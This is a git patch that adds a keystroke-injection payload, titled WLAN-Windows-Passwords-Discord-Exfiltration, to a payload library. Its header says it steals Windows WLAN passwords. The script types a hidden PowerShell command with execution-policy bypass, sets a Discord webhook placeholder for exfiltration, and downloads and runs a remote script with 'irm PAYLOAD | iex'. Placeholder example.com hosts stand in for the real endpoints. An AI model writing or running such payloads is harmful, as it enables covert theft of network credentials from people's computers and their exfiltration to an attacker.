From aaf34c1130a9d5a17306004113ca2ea8a19126ab Mon Sep 17 00:00:00 2001 From: Aleff Date: Mon, 12 Jun 2023 14:33:42 +0200 Subject: [PATCH] WLAN-Windows-Passwords-Discord-Exfiltration --- .../WLAN-Windows-Passwords/payload.txt | 25 +++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 payloads/library/credentials/WLAN-Windows-Passwords/payload.txt diff --git a/payloads/library/credentials/WLAN-Windows-Passwords/payload.txt b/payloads/library/credentials/WLAN-Windows-Passwords/payload.txt new file mode 100644 index 0000000..379fe45 --- /dev/null +++ b/payloads/library/credentials/WLAN-Windows-Passwords/payload.txt @@ -0,0 +1,25 @@ +REM ################################################################### +REM # | +REM # Title : WLAN-Windows-Passwords-Discord-Exfiltration | +REM # Author : Aleff | +REM # Description: A script used to stole target WLAN Passwords. | +REM # Category : Credentials | +REM # Target : Windows 10-11 | +REM # Version : 1.0 | +REM # | +REM ################################################################### + + + +DELAY 2000 +GUI r +DELAY 250 +STRING powershell -w h -ep bypass $discord=' + +REM REQUIRED - Provide Discord Webhook - https://discordapp.com/api/webhooks// +DEFINE DISCORD example.com +STRING DISCORD + +REM Reply example.com with YOUR LINK. The Payload should be Windows-Passwords.ps1 +DEFINE PAYLOAD example.com +STRINGLN ';irm PAYLOAD | iex